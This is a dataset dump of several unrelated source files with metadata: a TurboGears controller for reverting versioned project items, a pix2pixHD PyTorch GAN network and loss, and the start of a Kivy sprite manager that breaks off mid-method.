86, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask_app.models.login_info.Login_Info.add_login_info", "line_number": 90, "usage_type": "call"}, {"api_name": "flask_app.models.login_info.Login_Info", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 82, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "610644879", "text": "from sgp.lib.base import BaseController\nfrom sgp.model import DBSession\nfrom sgp.model.auth import Item,Fase,Atributo\nfrom sgp.managers.ItemMan import ItemManager\nfrom sgp.managers.FaseMan import FaseManager\nfrom sgp.managers.TipoItemMan import TipoItemManager\nfrom sgp.managers.CodigoMan import CodigoManager\nfrom sgp.managers.RelacionMan import RelacionManager\nfrom sgp.managers.LineaBaseMan import LineaBaseManager\nfrom sgp.managers.ProyectoMan import ProyectoManager\nfrom tg import expose, flash, redirect\nfrom tg.decorators import without_trailing_slash, with_trailing_slash\nimport transaction\n\nfrom tgext.crud import CrudRestController\nfrom sprox.tablebase import TableBase\nfrom sprox.fillerbase import TableFiller\nfrom sprox.formbase import AddRecordForm\nfrom sprox.formbase import EditableForm\nfrom sprox.fillerbase import EditFormFiller\n\nfrom tg.decorators import paginate\nimport pylons\nfrom pylons import tmpl_context \nfrom tg import session\n\n\n\nclass ItemTable(TableBase):\n __model__ = Item\n __omit_fields__ = ['id_item','observacion','complejidad','id_fase','id_linea_base','id_tipo_item','descripcion','adjuntos','atributos',]\n __xml_fields__ = ['nombre']\n \nitem_table = ItemTable(DBSession)\n##############################################################################\nclass ItemTableFiller(TableFiller):\n __model__ = Item\n \n buscado=\"\"\n def init(self,id_item):\n self.id_item=id_item\n\n\n def _do_get_provider_count_and_objs(self, buscado=\"\", **kw):\n im = ItemManager()\n item = im.getById(self.id_item)\n Campoes = im.getAnteriores(item.codigo, item.id_fase)\n return len(Campoes), Campoes \n\n def __actions__(self, obj):\n \"\"\"Override this function to define how action links should be displayed for the given record.\"\"\"\n primary_fields = self.__provider__.get_primary_fields(self.__entity__)\n pklist = '/'.join(map(lambda x: str(getattr(obj, x)), primary_fields))\n estado = obj.estado\n if estado != 'finalizado':\n #value = '
edit'\\\n # '
'\\\n value = '
Revertir'\\\n '
'\n\n\n\n else:\n value = '
'\\\n '
'\\\n '
'\\\n '
'\\\n '
'\n return value\n \nitem_table_filler = ItemTableFiller(DBSession)\nclass ItemRevertirController(CrudRestController):\n model = Item\n table = item_table\n table_filler = item_table_filler\n#******************************************************************************************\n def getNavegacionFromIdFase(self, id_fase):\n fm = FaseManager()\n fase = fm.getById(int(id_fase))\n proyecto = ProyectoManager().getById(fase.id_proyecto)\n navegacion = dict(id_fase = fase.id_fase, id_proyecto = fase.id_proyecto, fase = fase.nombre, proyecto=proyecto.nombre, admin_sistema=False)\n return (fase, navegacion)\n#******************************************************************************************\n def getNavegacionFromIdItem(self, id_item):\n item = ItemManager().getById(int(id_item))\n fase = FaseManager().getById(item.id_fase)\n proyecto = ProyectoManager().getById(fase.id_proyecto)\n navegacion = dict(id_fase = fase.id_fase, id_proyecto = fase.id_proyecto, fase = fase.nombre, proyecto=proyecto.nombre,admin_sistema=False)\n# print \"Navegacion\", navegacion\n return (item,navegacion)\n#******************************************************************************************\n#****************************************************************************************** \n @with_trailing_slash\n #@expose('sgp.templates.get_all_item')\n @expose('sgp.templates.item_revertir')\n @expose('json')\n @paginate('value_list', items_per_page=7)\n def get_all(self, *args, **kw):\n params = kw\n busqueda_filler = ItemTableFiller(DBSession)\n busqueda_filler.init(params[\"id_item\"])\n \n tmpl_context.widget = self.table\n value = busqueda_filler.get_value(**kw)\n item, navegacion = self.getNavegacionFromIdItem(params['id_item'])\n return dict(value_list=value, model=\"Item\", id_item = params['id_item'], navegacion=navegacion)\n \n#****************************************************************************************** \n @expose()\n def revertir(self,*args,**kw):\n id_item = kw[\"id_item\"]\n id_item = int(id_item)\n im = ItemManager()\n transaction.begin()\n item_revertir = im.getById(id_item)\n item_nuevo = Item()\n \n '''Copiar los campos'''\n item_nuevo.codigo = item_revertir.codigo\n item_nuevo.identificador = item_revertir.identificador\n item_nuevo.observacion = item_revertir.observacion\n item_nuevo.estado = 'revision'\n item_nuevo.complejidad = item_revertir.complejidad\n item_nuevo.id_fase = item_revertir.id_fase\n item_nuevo.id_tipo_item = item_revertir.id_tipo_item\n item_nuevo.descripcion = item_revertir.descripcion\n items_de_fase = im.buscar_por_fase(item_revertir.id_fase)\n id_fase = item_revertir.id_fase\n item_nuevo.id_linea_base = item_revertir.id_linea_base\n# item_revertir.id_linea_base = None\n version = 0\n# '''Estado del item revertido'''\n# if item_revertir.estado == 'aprobado':\n# item_nuevo.estado = 'listo' \n# else:\n# item_nuevo.estado = item_revertir.estado\n \n for item in items_de_fase:\n if item.version > version:\n version = item.version\n if item.codigo == item_revertir.codigo and item.actual == \"true\": \n item.actual = \"false\"\n version = version + 1\n item_nuevo.version = version\n item_nuevo.actual = 'true'\n \n im.add(item_nuevo)\n transaction.commit()\n \n item_viejo = im.getById(id_item)\n identificador = item_viejo.identificador\n \n tipo_item = item_viejo.id_tipo_item\n if tipo_item :\n for atributo in item_viejo.atributos:\n id_campo = atributo.id_campo\n valor = atributo.valor\n im.addAtributo(identificador,id_fase,version,id_campo,valor) \n im.update(item_viejo)\n transaction.begin()\n item_viejo = im.getById(id_item)\n item = im.getByIdentificadorFaseVersion(identificador,id_fase,version) #Item_nuevo\n '''Copiar los adjuntos'''\n if item_viejo.adjuntos :\n for adjunto in item_viejo.adjuntos:\n im.copiarAdjunto(item,adjunto)\n im.update(item)\n \n '''Recuperar Relaciones'''\n rm = RelacionManager()\n item = im.getByIdentificadorFaseVersion(identificador,id_fase,version) #Item_nuevo\n relaciones = rm.getByItem(item_viejo.id_item)\n id_item_nuevo = item.id_item\n for relacion in relaciones:\n transaction.begin()\n if relacion.id_item1 == item_viejo.id_item:\n item1 = item\n item2 = im.getById(relacion.id_item2)\n else:\n item1 = im.getById(relacion.id_item1)\n item2 = item\n \n if item1.actual == 'true' and item2.actual == 'true':\n if item1.id_fase == item2.id_fase : #son items de la misma fase\n if not rm.tieneciclos(item1, item2):#no tiene ciclos\n rm.add(item1,item2,'padre-hijo') \n else:\n rm.add(item1,item2,'antecesor-sucesor')\n transaction.commit()\n \n '''Marcar Para revision Item Relacionados'''\n lbm = LineaBaseManager()\n relaciones = rm.getByItem(id_item_nuevo)\n for relacion in relaciones:\n transaction.begin()\n if relacion.id_item1 == id_item_nuevo:\n item_revision = im.getById(relacion.id_item2)\n else:\n item_revision = im.getById(relacion.id_item1)\n \n item_revision.estado = 'revision'\n if item_revision.id_linea_base != None:\n linea_base = lbm.getById(item_revision.id_linea_base)\n linea_base.estado = 'no valido'\n lbm.update(linea_base)\n transaction.commit()\n \n transaction.commit()\n raise redirect('/item/items?id_fase='+ str(id_fase))\n \n ", "sub_path": "SGP/src/SGP/sgp/controllers/itemRevertir.py", "file_name": "itemRevertir.py", "file_ext": "py", "file_size_in_byte": 8720, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sprox.tablebase.TableBase", "line_number": 29, "usage_type": "name"}, {"api_name": "sgp.model.auth.Item", "line_number": 30, "usage_type": "name"}, {"api_name": "sgp.model.DBSession", "line_number": 34, "usage_type": "argument"}, {"api_name": "sprox.fillerbase.TableFiller", "line_number": 36, "usage_type": "name"}, {"api_name": "sgp.model.auth.Item", "line_number": 37, "usage_type": "name"}, {"api_name": "sgp.managers.ItemMan.ItemManager", "line_number": 45, "usage_type": "call"}, {"api_name": "sgp.model.DBSession", "line_number": 71, "usage_type": "argument"}, {"api_name": "tgext.crud.CrudRestController", "line_number": 72, "usage_type": "name"}, {"api_name": "sgp.model.auth.Item", "line_number": 73, "usage_type": "name"}, {"api_name": "sgp.managers.FaseMan.FaseManager", "line_number": 78, "usage_type": "call"}, {"api_name": "sgp.managers.ProyectoMan.ProyectoManager", "line_number": 80, "usage_type": "call"}, {"api_name": "sgp.managers.ItemMan.ItemManager", "line_number": 85, "usage_type": "call"}, {"api_name": "sgp.managers.FaseMan.FaseManager", "line_number": 86, "usage_type": "call"}, {"api_name": "sgp.managers.ProyectoMan.ProyectoManager", "line_number": 87, "usage_type": "call"}, {"api_name": "sgp.model.DBSession", "line_number": 100, "usage_type": "argument"}, {"api_name": "pylons.tmpl_context.widget", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pylons.tmpl_context", "line_number": 103, "usage_type": "name"}, {"api_name": "tg.decorators.with_trailing_slash", "line_number": 93, "usage_type": "name"}, {"api_name": "tg.expose", "line_number": 95, "usage_type": "call"}, {"api_name": "tg.expose", "line_number": 96, "usage_type": "call"}, {"api_name": "tg.decorators.paginate", "line_number": 97, "usage_type": "call"}, {"api_name": "sgp.managers.ItemMan.ItemManager", "line_number": 113, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 114, "usage_type": "call"}, {"api_name": "sgp.model.auth.Item", "line_number": 116, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 148, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 160, "usage_type": "call"}, {"api_name": "sgp.managers.RelacionMan.RelacionManager", "line_number": 170, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 175, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 189, "usage_type": "call"}, {"api_name": "sgp.managers.LineaBaseMan.LineaBaseManager", "line_number": 192, "usage_type": "call"}, {"api_name": "transaction.begin", "line_number": 195, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 206, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 208, "usage_type": "call"}, {"api_name": "tg.redirect", "line_number": 209, "usage_type": "call"}, {"api_name": "tg.expose", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "366950025", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom functools import partial\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, 0.0, 0.02)\n if m.bias is not None :\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.normal_(m.weight, 1.0, 0.02)\n if m.bias is not None :\n nn.init.zeros_(m.bias)\n\ndef get_norm_layer(type_norm='none'):\n if type_norm == 'batch' :\n norm = partial(nn.BatchNorm2d, momentum=0.9, affine=True, eps=1.01e-5)\n elif type_norm == 'instance' :\n norm = partial(nn.InstanceNorm2d, momentum=0.9, affine=False, eps=1.01e-5)\n elif type_norm == 'none' :\n norm = nn.Identity\n else :\n raise NotImplementedError('%s: invalid normalization type'%(type_norm))\n return norm\n\nclass ResidualBlock(nn.Module):\n def __init__(self, nb_feat, norm):\n super(ResidualBlock, self).__init__()\n\n self.build(nb_feat, norm)\n\n def build(self, nb_feat, norm):\n block = [nn.ReflectionPad2d(1),\n nn.Conv2d(nb_feat, nb_feat, kernel_size=3, stride=1, padding=0),\n norm(nb_feat), nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(nb_feat, nb_feat, kernel_size=3, stride=1, padding=0),\n norm(nb_feat)]\n self.block = nn.Sequential(*block)\n\n def forward(self, inp):\n return inp + self.block(inp)\n\nclass ResidualGenerator(nn.Module):\n def __init__(self, opt):\n super(ResidualGenerator, self).__init__()\n\n self.opt = opt\n self.build()\n print(self)\n\n def build(self):\n nb_feat = self.opt.nb_feature_init_G\n norm = get_norm_layer(self.opt.type_norm)\n act = nn.ReLU()\n\n block = []\n block += [nn.ReflectionPad2d(3),\n nn.Conv2d(self.opt.ch_inp, nb_feat, kernel_size=7, stride=1, padding=0),\n norm(nb_feat), act]\n\n for i in range(self.opt.nb_down_G):\n block += [nn.Conv2d(nb_feat, nb_feat*2, kernel_size=3, stride=2, padding=1),\n norm(nb_feat*2), act]\n nb_feat *= 2\n\n for j in range(self.opt.nb_block_G):\n block += [ResidualBlock(nb_feat, norm)]\n\n for k in range(self.opt.nb_down_G):\n block += [nn.ConvTranspose2d(nb_feat, nb_feat//2, kernel_size=3, stride=2, padding=1, output_padding=1),\n norm(nb_feat//2), act]\n nb_feat //=2\n\n block += [nn.ReflectionPad2d(3),\n nn.Conv2d(nb_feat, self.opt.ch_tar, kernel_size=7, stride=1, padding=0)]\n\n if self.opt.use_tanh :\n block += [nn.Tanh()]\n \n self.block = nn.Sequential(*block)\n print(self)\n\n def forward(self, inp):\n return self.block(inp)\n\nclass PixelDiscriminator(nn.Module):\n def __init__(self, opt):\n super(PixelDiscriminator, self).__init__()\n self.opt = opt\n self.build()\n print(self)\n\n def build(self):\n nb_feat = self.opt.nb_feature_init_D\n norm = get_norm_layer(self.opt.type_norm)\n\n block = [nn.Conv2d(self.opt.ch_inp+self.opt.ch_tar, nb_feat, kernel_size=1, stride=1, padding=0),\n nn.LeakyReLU(0.2),\n nn.Conv2d(nb_feat, nb_feat*2, kernel_size=1, stride=1, padding=0),\n norm(nb_feat*2), nn.LeakyReLU(0.2),\n nn.Conv2d(nb_feat*2, 1, kernel_size=1, stride=1, padding=0)]\n if self.opt.use_sigmoid :\n block += [nn.Sigmoid()]\n self.block = nn.Sequential(*block)\n\n def forward(self, inp):\n return self.block(inp)\n\nclass PatchDiscriminator(nn.Module):\n def __init__(self, opt):\n super(PatchDiscriminator, self).__init__()\n self.opt = opt\n self.build()\n print(self)\n\n def build(self):\n nb_feat = self.opt.nb_feature_init_D\n norm = get_norm_layer(self.opt.type_norm)\n \n blocks = []\n block = [nn.Conv2d(self.opt.ch_inp+self.opt.ch_tar, nb_feat, kernel_size=4, stride=2, padding=1),\n nn.LeakyReLU(0.2)]\n blocks.append(block)\n\n for n in range(1, self.opt.nb_layer_D):\n block = [nn.Conv2d(nb_feat, nb_feat*2, kernel_size=4, stride=2, padding=1),\n norm(nb_feat*2), nn.LeakyReLU(0.2)]\n blocks.append(block)\n nb_feat *= 2\n\n block = [nn.Conv2d(nb_feat, nb_feat*2, kernel_size=4, stride=1, padding=1),\n norm(nb_feat*2), nn.LeakyReLU(0.2)]\n blocks.append(block)\n nb_feat *= 2\n\n block = [nn.Conv2d(nb_feat, 1, kernel_size=4, stride=1, padding=1)]\n if self.opt.use_sigmoid :\n block += [nn.Sigmoid()]\n blocks.append(block)\n\n self.nb_blocks = len(blocks)\n for i in range(self.nb_blocks):\n setattr(self, 'block_%d'%(i), nn.Sequential(*blocks[i]))\n\n def forward(self, inp):\n result = [inp]\n for n in range(self.nb_blocks):\n block = getattr(self, 'block_%d'%(n))\n result.append(block(result[-1]))\n return result[1:]\n\nclass MultiPatchDiscriminator(nn.Module):\n def __init__(self, opt):\n super(MultiPatchDiscriminator, self).__init__()\n self.nb_D = opt.nb_D\n for n in range(opt.nb_D):\n setattr(self, 'Discriminator_%d'%(n), PatchDiscriminator(opt))\n self.downsample = nn.AvgPool2d(kernel_size=3, padding=1, stride=2)\n def forward(self, inp):\n result = []\n for n in range(self.nb_D):\n if n != 0 :\n inp = self.downsample(inp)\n result.append(getattr(self, 'Discriminator_%d'%(n))(inp))\n return result\n\nclass Loss:\n def __init__(self, opt, device):\n\n self.device = device\n self.nb_D = opt.nb_D\n self.weight_FM_loss = opt.weight_FM_loss\n\n if opt.type_gan == 'gan' :\n self.criterion = nn.BCELoss().to(self.device)\n elif opt.type_gan == 'lsgan' :\n self.criterion = nn.MSELoss().to(self.device)\n\n self.FMcriterion = nn.L1Loss().to(self.device)\n\n def __call__(self, network_D, network_G, inp, tar):\n loss_D = 0\n loss_G_fake = 0\n loss_G_FM = 0\n\n gen = network_G(inp)\n\n outputs_D_real = network_D(torch.cat([inp, tar], 1))\n outputs_D_fake = network_D(torch.cat([inp, gen.detach()], 1))\n\n for n in range(self.nb_D):\n output_D_real = outputs_D_real[n][-1]\n output_D_fake = outputs_D_fake[n][-1]\n target_D_real = torch.ones_like(output_D_real, dtype=torch.float).to(self.device)\n target_D_fake = torch.zeros_like(output_D_fake, dtype=torch.float).to(self.device)\n loss_D_real = self.criterion(output_D_real, target_D_real)\n loss_D_fake = self.criterion(output_D_fake, target_D_fake)\n loss_D += (loss_D_real+loss_D_fake)/2.\n\n outputs_G_fake = network_D(torch.cat([inp, gen], 1))\n for n in range(self.nb_D):\n output_G_fake = outputs_G_fake[n][-1]\n target_G_fake = torch.ones_like(output_G_fake, dtype=torch.float).to(self.device)\n loss_G_fake += self.criterion(output_G_fake, target_G_fake)\n\n features_real = outputs_D_real[n][:-1]\n features_fake = outputs_G_fake[n][:-1]\n for m in range(len(features_real)):\n loss_G_FM += self.FMcriterion(features_fake[m], features_real[m].detach())* self.weight_FM_loss\n\n loss_D *= (1./self.nb_D)\n loss_G_fake *= (1./self.nb_D)\n loss_G_FM *= (1./self.nb_D)\n\n return gen, loss_D, loss_G_fake, loss_G_FM\n\n\nif __name__ == '__main__' :\n from option import TrainOption\n opt = TrainOption().parse()\n network_D = MultiPatchDiscriminator(opt)\n network_G = ResidualGenerator(opt)\n\n inp = torch.ones((opt.batch_size, opt.ch_inp, opt.height, opt.width))\n tar = torch.ones((opt.batch_size, opt.ch_tar, opt.height, opt.width))\n\n print(inp.shape, tar.shape)\n\n device = torch.device('cpu')\n loss = Loss(opt, device)\n gen, loss_D, loss_G_fake, loss_G_FM = loss(network_D, network_G, inp, tar)\n print(loss_D, loss_G_fake, loss_G_FM)\n\n\n\n", "sub_path": "pytorch/pix2pixhd/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 8219, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Conv2d", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.init.zeros_", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.init.zeros_", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.InstanceNorm2d", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Identity", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.ReflectionPad2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 154, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 196, "usage_type": "attribute"}, {"api_name": "torch.zeros_like", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 197, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 205, "usage_type": "attribute"}, {"api_name": "option.TrainOption", "line_number": 222, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "428869818", "text": "import Utility as Util\nfrom Utility import *\nimport math\nfrom kivy.graphics import Scale, Rotate, PushMatrix, PopMatrix, Translate, \\\n UpdateNormalMatrix\n\n#---------------------#\n# Global instance\n#---------------------#\ndef setGlobalInstance():\n global gSpriteMgr\n gSpriteMgr = SpriteMgr.instance()\n \n#---------------------#\n# CLASS : SpriteMgr\n#---------------------#\nclass SpriteMgr(Widget, Singleton, object):\n def __init__(self):\n Widget.__init__(self)\n self.spriteList = []\n Util.MyRoot.instance().regist(self)\n \n def reset(self):\n for sprite in self.spriteList:\n if sprite.parent:\n sprite.parent.remove_widget(sprite)\n self.spriteList = [] \n \n def regist(self, sprite):\n if sprite not in self.spriteList:\n self.spriteList.append(sprite) \n \n def remove(self, sprite):\n if sprite in self.spriteList:\n if sprite.parent:\n sprite.parent.remove_widget(sprite)\n self.spriteList.pop(sprite)\n \n def update(self, dt):\n for sprite in self.spriteList:\n if sprite.parent:\n sprite.update(dt)\n\n#---------------------#\n# CLASS : Sprite\n#---------------------#\nclass Sprite(Widget, object):\n def __init__(self, pos=cXY, size=(100.0, 100.0), **kargs):\n Widget.__init__(self, pos=pos, size=size)\n self.box = None\n self.oldPos = None\n self.boxPos = None\n self.boxRot = None\n self.boxScale = None\n self.color = Color(1,1,1,1)\n self.source = None\n self.texture = None\n self.collision = False\n self.collisionSpace = (0.0, 0.0, Util.W, Util.H)\n self.elastin = 0.3\n self.friction = 0.8\n self.gravity = 0.0\n self.vel = [0.0, 0.0]\n self.rotate = 0.0\n self.rotateVel = 0.0\n self.scaling = 1.0\n self.radius = 0\n self.opacity = 1.0\n self.offset = (0.0, 0.0)\n self.realSize = (0,0)\n self.isGround = False\n self.isTouched = False\n self.isAttached = False\n self.touchable = True\n self.throwable = True\n self.touchOffset = (0,0)\n self.updateRotation = True\n self.updateTranslate = True\n self.attachOffsetList = {}\n \n # set argment\n for key in kargs:\n if not hasattr(self, key):\n raise AttributeError(self.__class__.__name__ + \" not found \" + key)\n setattr(self, key, kargs[key])\n # if vel is maybe tuple, convert to list\n self.vel = list(self.vel)\n \n # clamp\n self.elastin = max(min(self.elastin, 1.0), 0.0)\n \n if self.source != None:\n self.texture = self.source.texture\n \n with self.canvas:\n self.color = self.color\n self.box = Rectangle(texture=self.texture, pos=(0,0), size=self.size)\n with self.canvas.before:\n PushMatrix()\n self.boxPos = Translate(0,0)\n self.boxRot = Rotate(angle=0, axis=(0,0,1), origin=mul(mul(self.size, 0.5), self.scaling))\n self.boxScale = Scale(1,1,1)\n with self.canvas.after:\n PopMatrix()\n \n self.boxPos.x = self.pos[0] + (-self.size[0] * 0.5)\n self.boxPos.y = self.pos[1] + (-self.size[1] * 0.5)\n self.pos = (0,0)\n self.oldPos = (self.boxPos.x, self.boxPos.y)\n self.boxRot.origin = mul(mul(self.size, 0.5), self.scaling)\n self.boxRot.angle = self.rotate\n self.boxScale.xyz = (self.scaling, self.scaling, self.scaling) \n self.realSize = mul(self.size, self.scaling)\n self.radius = math.sqrt((self.realSize[0] * 0.5) ** 2 + (self.realSize[1] * 0.5) ** 2)\n # regist\n gSpriteMgr.regist(self)\n \n def on_touch_down(self, touch):\n if not touch.grab_current and not self.isTouched:\n if self.touchable and not self.isAttached:\n if touch.pos[0] > self.boxPos.x and touch.pos[1] > self.boxPos.y and \\\n touch.pos[0] < self.boxPos.x + self.realSize[0] and touch.pos[1] < self.boxPos.y + self.realSize[1]:\n self.isTouched = True\n self.setVelocity(0,0)\n self.touchOffset = sub((self.boxPos.x, self.boxPos.y), touch.pos)\n self.setUpdateTranslate(False)\n touch.grab_current = self\n \n def on_touch_move(self, touch):\n if touch.grab_current is self:\n 